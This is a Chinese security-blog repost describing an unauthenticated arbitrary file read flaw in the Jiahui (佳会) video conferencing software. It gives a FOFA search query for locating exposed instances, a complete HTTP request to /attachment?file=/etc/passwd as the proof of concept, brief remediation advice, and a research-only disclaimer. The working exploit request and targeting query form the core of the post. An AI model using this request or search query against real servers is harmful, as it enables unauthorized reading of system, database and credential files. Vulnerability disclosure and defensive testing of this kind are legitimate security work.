漏洞复现 | 佳会视频会议attachment任意文件读取漏洞【附poc】

admin 2024年5月21日12:02:14评论78 views字数 864阅读2分52秒阅读模式

一、漏洞简述

佳会视频会议是由杭州叁体网络科技有限公司开发的一款线上视频会议软件,叁体·佳会3.0是业内首家兼容HTML5/WebRTC技术的网络会议产品,无需下载任何客户端与插件,即可开启视频会议,无需下载插件即可分享屏幕,甚至只需要用微信/QQ扫描二维码,就能加入视频会议。其attachment接口存在任意文件读取漏洞,未经身份认证恶意攻击者可以读取系统重要文件(如系统配置文件、数据库配置文件)等等。

漏洞复现 | 佳会视频会议attachment任意文件读取漏洞【附poc】

二、网络测绘

fofa:body="/system/get_rtc_user_defined_info?site_id"

三、漏洞复现

测试读取passwd文件

漏洞复现 | 佳会视频会议attachment任意文件读取漏洞【附poc】

四、漏洞检测poc

GET /attachment?file=/etc/passwd HTTP/1.1Host: 0.0.0.0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1Te: trailersConnection: close


五、漏洞修复

1、建议联系厂商打补丁或升级版本。

2、增加Web应用防火墙防护。

3、关闭互联网暴露面或接口设置访问权限。

原文始发于微信公众号(实战安全研究):漏洞复现 | 佳会视频会议attachment任意文件读取漏洞【附poc】

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月21日12:02:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现 | 佳会视频会议attachment任意文件读取漏洞【附poc】https://cn-sec.com/archives/2763010.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息